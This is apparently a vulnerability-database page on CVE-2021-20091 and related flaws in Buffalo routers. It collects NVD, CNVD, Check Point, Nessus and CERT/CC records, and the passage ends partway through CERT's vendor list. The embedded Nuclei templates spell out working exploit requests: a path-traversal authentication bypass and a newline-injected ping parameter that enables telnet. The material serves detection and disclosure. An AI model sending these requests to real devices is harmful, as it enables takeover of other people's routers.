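The web interfaces of Buffalo WSR-2533DHPL2 firmware version <= 1.02 and WSR-2533DHP3 firmware version <= 1.24 do not properly sanitize user input. An authenticated remote attacker could leverage this vulnerability to alter device configuration, potentially gaining remote code execution. The authentication requirement (NVD scores this CVSS 3.1 8.8 with PR:L) offers little protection on its own: the scanner and advisory records below pair this issue with CVE-2021-20090, a path traversal that lets unauthenticated attackers bypass authentication, and score the combination 9.8 with PR:N. Those records also mark the chain as known-exploited and recommend updating firmware and disabling WAN-side administration; the Nessus plugin (modified 2023-04-25) lists no known fix for WSR-2533DHPL2, so on that model restricting access to the web interface is the mitigation these records support.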
{"cnvd": [{"lastseen": "2022-11-05T11:07:04", "description": "Buffalo WSR-2533DHPL2 and WSR-2533DHP3 are routers from Buffalo Japan.The Buffalo WSR-2533DHPL2 and WSR-2533DHP3 are vulnerable to code injection, which can be exploited by attackers to remotely execute code.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-04-28T00:00:00", "type": "cnvd", "title": "Buffalo WSR-2533DHPL2 and WSR-2533DHP3 Code Injection Vulnerability", "bulletinFamily": "cnvd", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-20091"], "modified": "2021-07-30T00:00:00", "id": "CNVD-2021-56800", "href": "https://www.cnvd.org.cn/flaw/show/CNVD-2021-56800", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}], "cve": [{"lastseen": "2023-12-07T16:21:25", "description": "The web interfaces of Buffalo WSR-2533DHPL2 firmware version <= 1.02 and WSR-2533DHP3 firmware version <= 1.24 do not properly sanitize user input. 
An authenticated remote attacker could leverage this vulnerability to alter device configuration, potentially gaining remote code execution.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-04-29T15:15:00", "type": "cve", "title": "CVE-2021-20091", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-20091"], "modified": "2021-05-05T18:01:00", "cpe": ["cpe:/o:buffalo:wsr-2533dhp3-bk_firmware:1.24", "cpe:/o:buffalo:wsr-2533dhpl2-bk_firmware:1.02"], "id": "CVE-2021-20091", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-20091", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:o:buffalo:wsr-2533dhpl2-bk_firmware:1.02:*:*:*:*:*:*:*", "cpe:2.3:o:buffalo:wsr-2533dhp3-bk_firmware:1.24:*:*:*:*:*:*:*"]}], "checkpoint_advisories": [{"lastseen": "2022-02-16T19:38:03", "description": "A directory traversal vulnerability exists in Buffalo routers. 
Successful exploitation of this vulnerability could allow an attacker to access arbitrary files on the affected system.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-08-23T00:00:00", "type": "checkpoint_advisories", "title": "Buffalo Routers Directory Traversal (CVE-2021-20090; CVE-2021-20091)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-20090", "CVE-2021-20091"], "modified": "2021-08-23T00:00:00", "id": "CPAI-2021-0497", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "nuclei": [{"lastseen": "2023-12-07T22:11:37", "description": "\n The web interfaces of Buffalo WSR-2533DHPL2 firmware version <= 1.02 and WSR-2533DHP3 firmware version <= 1.24 does not properly sanitize user input. 
An authenticated remote attacker could leverage this vulnerability to alter device configuration, potentially leading to remote code execution.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-08-11T00:00:00", "type": "nuclei", "title": "Buffalo WSR-2533DHPL2 - Configuration File Injection", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-20090", "CVE-2021-20091"], "modified": "2023-12-05T00:00:00", "id": "NUCLEI:CVE-2021-20091", "href": "https://github.com/projectdiscovery/nuclei-templates/tree/main/http/cves/2021/CVE-2021-20091.yaml", "sourceData": "id: CVE-2021-20091\n\ninfo:\n name: Buffalo WSR-2533DHPL2 - Configuration File Injection\n author: gy741,pdteam,parth\n severity: high\n description: |\n The web interfaces of Buffalo WSR-2533DHPL2 firmware version <= 1.02 and WSR-2533DHP3 firmware version <= 1.24 does not properly sanitize user input. 
An authenticated remote attacker could leverage this vulnerability to alter device configuration, potentially leading to remote code execution.\n remediation: |\n Apply the latest firmware update provided by Buffalo to fix the configuration file injection vulnerability.\n reference:\n - https://blogs.juniper.net/en-us/security/freshly-disclosed-vulnerability-cve-2021-20090-exploited-in-the-wild\n - https://www.tenable.com/security/research/tra-2021-13\n - https://medium.com/tenable-techblog/bypassing-authentication-on-arcadyan-routers-with-cve-2021-20090-and-rooting-some-buffalo-ea1dd30980c2\n - https://nvd.nist.gov/vuln/detail/CVE-2021-20091\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 8.8\n cve-id: CVE-2021-20091\n epss-score: 0.00928\n epss-percentile: 0.81194\n cpe: cpe:2.3:o:buffalo:wsr-2533dhpl2-bk_firmware:*:*:*:*:*:*:*:*\n metadata:\n max-request: 2\n vendor: buffalo\n product: wsr-2533dhpl2-bk_firmware\n tags: cve,cve2021,buffalo,firmware,iot,tenable\n\nhttp:\n - raw:\n - |\n GET /images/..%2finfo.html HTTP/1.1\n Host: {{Hostname}}\n Referer: {{BaseURL}}/info.html\n - |\n POST /images/..%2fapply_abstract.cgi HTTP/1.1\n Host: {{Hostname}}\n Referer: {{BaseURL}}/info.html\n Content-Type: application/x-www-form-urlencoded\n\n action=start_ping&httoken={{trimprefix(base64_decode(httoken), base64_decode(\"R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7\"))}}&submit_button=ping.html&action_params=blink_time%3D5&ARC_ping_ipaddress=127.0.0.1%0AARC_SYS_TelnetdEnable=1&ARC_ping_status=0&TMP_Ping_Type=4\n\n matchers-condition: and\n matchers:\n - type: word\n part: header\n words:\n - \"/Success.htm\"\n\n - type: status\n status:\n - 302\n\n extractors:\n - type: regex\n name: httoken\n group: 1\n regex:\n - 'base64\\,(.*?)\" border='\n internal: true\n\n# digest: 
4b0a00483046022100a9d0218e666d812c6c4a2daa70e18d141da012ad397defe99a448a60653f6beb022100e942d25e288d94f5770cc5263e99a2179a7cdb51cd6b835ae0560e391f7b858f:922c64590222798bb761d5b6d8e72950", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-12-07T22:11:38", "description": "\n The web interfaces of Buffalo WSR-2533DHPL2 firmware version <= 1.02 and WSR-2533DHP3 firmware version <= 1.24 do not properly restrict access to sensitive information from an unauthorized actor.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-08-11T00:00:00", "type": "nuclei", "title": "Buffalo WSR-2533DHPL2 - Improper Access Control", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-20090", "CVE-2021-20091", "CVE-2021-20092"], "modified": "2023-12-05T00:00:00", "id": "NUCLEI:CVE-2021-20092", "href": "https://github.com/projectdiscovery/nuclei-templates/tree/main/http/cves/2021/CVE-2021-20092.yaml", "sourceData": "id: CVE-2021-20092\n\ninfo:\n name: Buffalo WSR-2533DHPL2 - Improper Access Control\n author: gy741,pdteam,parth\n severity: high\n description: |\n The web interfaces of 
Buffalo WSR-2533DHPL2 firmware version <= 1.02 and WSR-2533DHP3 firmware version <= 1.24 do not properly restrict access to sensitive information from an unauthorized actor.\n remediation: |\n Apply the latest firmware update provided by Buffalo to fix the access control issue.\n reference:\n - https://www.tenable.com/security/research/tra-2021-13\n - https://medium.com/tenable-techblog/bypassing-authentication-on-arcadyan-routers-with-cve-2021-20090-and-rooting-some-buffalo-ea1dd30980c2\n - https://nvd.nist.gov/vuln/detail/CVE-2021-20091\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n cvss-score: 7.5\n cve-id: CVE-2021-20092\n cwe-id: CWE-287\n epss-score: 0.01372\n epss-percentile: 0.84784\n cpe: cpe:2.3:o:buffalo:wsr-2533dhpl2-bk_firmware:*:*:*:*:*:*:*:*\n metadata:\n max-request: 2\n vendor: buffalo\n product: wsr-2533dhpl2-bk_firmware\n tags: cve,cve2021,buffalo,firmware,iot,tenable\n\nhttp:\n - raw:\n - |\n GET /images/..%2finfo.html HTTP/1.1\n Host: {{Hostname}}\n Referer: {{BaseURL}}/info.html\n - |\n GET /images/..%2fcgi/cgi_i_filter.js?_tn={{trimprefix(base64_decode(httoken), base64_decode(\"R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7\"))}} HTTP/1.1\n Host: {{Hostname}}\n Cookie: lang=8; url=ping.html; mobile=false;\n Referer: {{BaseURL}}/info.html\n Content-Type: application/x-www-form-urlencoded\n\n matchers-condition: and\n matchers:\n - type: word\n part: header\n words:\n - \"application/x-javascript\"\n\n - type: word\n words:\n - \"/*DEMO*/\"\n - \"addCfg(\"\n condition: and\n\n - type: status\n status:\n - 200\n\n extractors:\n - type: regex\n name: httoken\n group: 1\n regex:\n - 'base64\\,(.*?)\" border='\n internal: true\n\n# digest: 490a00463044022069ffd5f6dad61177e502063557b89ae45bedf7ad53a39e2b3901203f026dfb24022074ffed37ce22e883db1def11fe90103c6b904e5d9fe6a82d059e571ef9a65004:922c64590222798bb761d5b6d8e72950", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "nessus": 
[{"lastseen": "2023-05-26T14:27:33", "description": "Nessus was able to determine that the remote Buffalo device is affected by multiple vulnerabilities:\n - A path traversal vulnerability in the web interfaces of certain Buffalo router models could allow unauthenticated remote attackers to bypass authentication. (CVE-2021-20090)\n\n - The web interfaces of certain Buffalo router models do not properly sanitize user input. An authenticated remote attacker could leverage this vulnerability to alter device configuration, potentially gaining remote code execution. (CVE-2021-20091)\n\n - The web interfaces of certain Buffalo router models do not properly restrict access to sensitive information from an unauthorized actor. (CVE-2021-20092)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2021-08-04T00:00:00", "type": "nessus", "title": "Buffalo Routers Multiple Vulnerabilities (TRA-2021-13)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-20090", "CVE-2021-20091", "CVE-2021-20092"], "modified": "2023-04-25T00:00:00", "cpe": ["x-cpe:/a:buffalo:buffalo"], "id": "BUFFALO_WSR_CVE_2021_20090.NASL", "href": "https://www.tenable.com/plugins/nessus/152198", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable Network Security, Inc.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(152198);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/04/25\");\n\n script_cve_id(\"CVE-2021-20090\", \"CVE-2021-20091\", \"CVE-2021-20092\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/11/17\");\n\n script_name(english:\"Buffalo Routers Multiple Vulnerabilities (TRA-2021-13)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote device is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", 
value:\n\"Nessus was able to determine that the remote Buffalo device is affected by multiple vulnerabilities:\n \n - A path traversal vulnerability in the web interfaces of certain Buffalo router models could \n allow unauthenticated remote attackers to bypass authentication. (CVE-2021-20090)\n\n - The web interfaces of certain Buffalo router models do not properly sanitize user input. An \n authenticated remote attacker could leverage this vulnerability to alter device configuration, \n potentially gaining remote code execution. (CVE-2021-20091)\n\n - The web interfaces of certain Buffalo router models do not properly restrict access to \n sensitive information from an unauthorized actor. (CVE-2021-20092)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's \nself-reported version number.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.tenable.com/security/research/tra-2021-13\");\n script_set_attribute(attribute:\"solution\", value:\n\"Vendor has released fixes for certain models. 
Contact vendor for more information.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-20090\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/04/26\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/04/26\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/08/04\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"x-cpe:/a:buffalo:buffalo\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Misc.\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2023 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"buffalo_www_detect.nbin\");\n script_require_keys(\"installed_sw/Buffalo WWW\");\n script_require_ports(\"Services/www\", 80);\n\n exit(0);\n}\n\ninclude('vcf.inc');\ninclude('http.inc');\n\nvar port = get_http_port(default:80, embedded:TRUE);\nvar app_info = vcf::get_app_info(app:'Buffalo WWW', webapp:TRUE, port:port);\nvar constraints;\n\nif('WSR-2533DHPL2' >< app_info.model || 'WXR-5700AX7S' >< app_info.model || 'WSR-1166DHP2' >< app_info.model )\n constraints = [{'min_version' : '0', 'fixed_display' : 'No known fix' }];\nelse if('WSR-A2533DHP3' >< app_info.model) \n constraints = [{'min_version' : '0', 'fixed_version' : '1.25' }];\nelse if('WSR-3200AX4S' >< app_info.model)\n constraints = [{'min_version' : '0', 'fixed_version' : '1.20' }];\nelse\n{\n var ver_model = app_info.version;\n if (!empty_or_null(app_info.model))\n ver_model = ver_model + ' (model '+app_info.model+')';\n audit(AUDIT_INST_VER_NOT_VULN, app_info.app, ver_model);\n}\n\nvcf::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_HOLE);\n", "cvss": {"score": 0.0, "vector": "NONE"}}], "cert": [{"lastseen": "2023-12-07T17:26:40", "description": "### Overview\n\nA path traversal vulnerability exists in numerous routers manufactured by multiple vendors using Arcadyan based software. This vulnerability allows an unauthenticated user access to sensitive information and allows for the alteration of the router configuration.\n\n### Description\n\nThe vulnerability, identified as [CVE-2021-20090](<https://vulners.com/cve/CVE-2021-20090>), is a path traversal vulnerability. An unauthenticated attacker is able to leverage this vulnerability to access resources that would normally be protected. 
The researcher initially thought it was limited to one router manufacturer and published their [findings](<https://www.tenable.com/security/research/tra-2021-13>), but then discovered that the issue existed in the Arcadyan based software that was being used in routers from multiple vendors.\n\n### Impact\n\nSuccessful exploitation of this vulnerability could allow an attacker to access pages that would otherwise require authentication. An unauthenticated attacker could gain access to sensitive information, including valid request tokens, which could be used to make requests to alter router settings.\n\n### Solution\n\nThe CERT/CC recommends updating your router to the latest available firmware version. It is also recommended to disable the remote (WAN-side) administration services on any SoHo router and also disable the web interface on the WAN. \n\n### Acknowledgements\n\nThanks to the reporter Evan Grant from Tenable.\n\nThis document was written by Timur Snoke.\n\n### Vendor Information\n\n914124\n\n### Buffalo Technology __ Affected\n\nNotified: 2021-07-06 Updated: 2021-08-03 **CVE-2021-20090**| Affected \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n#### References\n\n * <https://www.buffalo.jp/news/detail/20210427-03.html>\n\n### Deutsche Telekom __ Affected\n\nNotified: 2021-08-10 Updated: 2021-08-10\n\n**Statement Date: August 10, 2021**\n\n**CVE-2021-20090**| Affected \n---|--- \n \n#### Vendor Statement\n\na detailed List and Product Advisory is being created, as well as fixes.\n\n### ADTRAN Not Affected\n\nNotified: 2021-08-10 Updated: 2021-08-10\n\n**Statement Date: August 10, 2021**\n\n**CVE-2021-20090**| Not Affected \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### AVM GmbH __ Not 
Affected\n\nNotified: 2021-08-10 Updated: 2021-08-12\n\n**Statement Date: August 12, 2021**\n\n**CVE-2021-20090**| Not Affected \n---|--- \n \n#### Vendor Statement\n\nAVM does not utilize Arcadyan components.\n\n#### References\n\n * <https://en.avm.de/security/>\n\n### Actiontec Not Affected\n\nNotified: 2021-08-10 Updated: 2021-08-10\n\n**Statement Date: August 10, 2021**\n\n**CVE-2021-20090**| Not Affected \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Brocade Communication Systems __ Not Affected\n\nNotified: 2021-08-10 Updated: 2021-08-10\n\n**Statement Date: August 10, 2021**\n\n**CVE-2021-20090**| Not Affected \n---|--- \n \n#### Vendor Statement\n\nNo Brocade Fibre Channel Products from Broadcom products are currently known to be affected by this vulnerability.\n\n### Check Point Not Affected\n\nNotified: 2021-08-10 Updated: 2021-08-11\n\n**Statement Date: August 11, 2021**\n\n**CVE-2021-20090**| Not Affected \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Cradlepoint Not Affected\n\nNotified: 2021-08-10 Updated: 2021-08-10\n\n**Statement Date: August 10, 2021**\n\n**CVE-2021-20090**| Not Affected \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Dell Not Affected\n\nNotified: 2021-08-10 Updated: 2021-08-10\n\n**Statement Date: August 10, 2021**\n\n**CVE-2021-20090**| Not Affected \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### F5 Networks Inc. 
Not Affected\n\nNotified: 2021-08-10 Updated: 2021-08-10\n\n**Statement Date: August 10, 2021**\n\n**CVE-2021-20090**| Not Affected \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Intel Not Affected\n\nNotified: 2021-08-10 Updated: 2021-08-10\n\n**Statement Date: August 10, 2021**\n\n**CVE-2021-20090**| Not Affected \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Juniper Networks __ Not Affected\n\nNotified: 2021-08-10 Updated: 2021-10-07\n\n**Statement Date: October 07, 2021**\n\n**CVE-2021-20090**| Not Affected \n---|--- \n \n#### Vendor Statement\n\nJuniper Networks Junos OS and Junos OS Evolved are not affected by CVE-2021-20090, CVE-2021-20091, and CVE-2021-20092.\n\n#### References\n\n * [SIR-2021-353 and PR 1613180 were created for this issue.](<SIR-2021-353 and PR 1613180 were created for this issue.>)\n\n### LANCOM Systems GmbH Not Affected\n\nNotified: 2021-08-10 Updated: 2021-08-16\n\n**Statement Date: August 16, 2021**\n\n**CVE-2021-20090**| Not Affected \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### OpenWRT Not Affected\n\nNotified: 2021-08-10 Updated: 2021-08-10\n\n**Statement Date: August 10, 2021**\n\n**CVE-2021-20090**| Not Affected \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Peplink Not Affected\n\nNotified: 2021-08-10 Updated: 2021-08-11\n\n**Statement Date: August 11, 2021**\n\n**CVE-2021-20090**| Not Affected \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Sierra Wireless Not Affected\n\nNotified: 2021-08-10 Updated: 2021-08-10\n\n**Statement Date: August 10, 2021**\n\n**CVE-2021-20090**| Not Affected \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Synology Not Affected\n\nNotified: 2021-08-10 Updated: 2021-08-12\n\n**Statement Date: August 12, 
2021**\n\n**CVE-2021-20090**| Not Affected \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Wind River __ Not Affected\n\nNotified: 2021-08-10 Updated: 2021-09-06\n\n**Statement Date: September 06, 2021**\n\n**CVE-2021-20090**| Not Affected \n---|--- \n \n#### Vendor Statement\n\nVxWorks are not affect as we do not use Arcadyan-based routers and modems\n\n### Zyxel Not Affected\n\nNotified: 2021-08-10 Updated: 2021-08-18\n\n**Statement Date: August 18, 2021**\n\n**CVE-2021-20090**| Not Affected \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### dd-wrt Not Affected\n\nNotified: 2021-08-10 Updated: 2021-08-11\n\n**Statement Date: August 11, 2021**\n\n**CVE-2021-20090**| Not Affected \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### D-Link Systems Inc. __ Unknown\n\nNotified: 2021-08-10 Updated: 2021-09-06\n\n**Statement Date: August 31, 2021**\n\n**CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nD-Link US SIRT,\n\nAfter full investigation, D-Link has confirmed that no D-Link product are affected by this issue.\n\nRegards, security@dlink.com William Brown D-Link US SIRT\n\n#### References\n\n * [None Applicable](<None Applicable>)\n\n### A10 Networks Unknown\n\nNotified: 2021-08-10 Updated: 2021-08-10 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### ACCESS Unknown\n\nNotified: 2021-08-10 Updated: 2021-08-10 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### ARRIS Unknown\n\nNotified: 2021-08-10 Updated: 2021-08-10 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### ASUSTeK Computer Inc. 
Unknown\n\nNotified: 2021-07-06 Updated: 2021-07-20 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### AT&T Unknown\n\nNotified: 2021-08-10 Updated: 2021-08-10 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Alcatel-Lucent Enterprise Unknown\n\nNotified: 2021-08-10 Updated: 2021-08-10 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Arcadyan Unknown\n\nNotified: 2021-07-06 Updated: 2021-07-20 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Avaya Inc. Unknown\n\nNotified: 2021-08-10 Updated: 2021-08-10 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Beeline Unknown\n\nNotified: 2021-07-06 Updated: 2021-07-20 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Belkin Inc. 
Unknown\n\nNotified: 2021-08-10 Updated: 2021-08-10 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### British Telecommunications Unknown\n\nNotified: 2021-07-06 Updated: 2021-07-20 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Cisco Unknown\n\nNotified: 2021-08-10 Updated: 2021-08-10 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Comcast Unknown\n\nNotified: 2021-08-10 Updated: 2021-08-10 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Commscope Unknown\n\nNotified: 2021-08-10 Updated: 2021-08-10 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Extreme Networks Unknown\n\nNotified: 2021-08-10 Updated: 2021-08-10 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### F-Secure Corporation Unknown\n\nNotified: 2021-08-10 Updated: 2021-08-10 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Hitachi Unknown\n\nNotified: 2021-08-10 Updated: 2021-08-10 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Huawei Unknown\n\nNotified: 2021-08-10 Updated: 2021-08-10 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Hughes Network Systems Inc. 
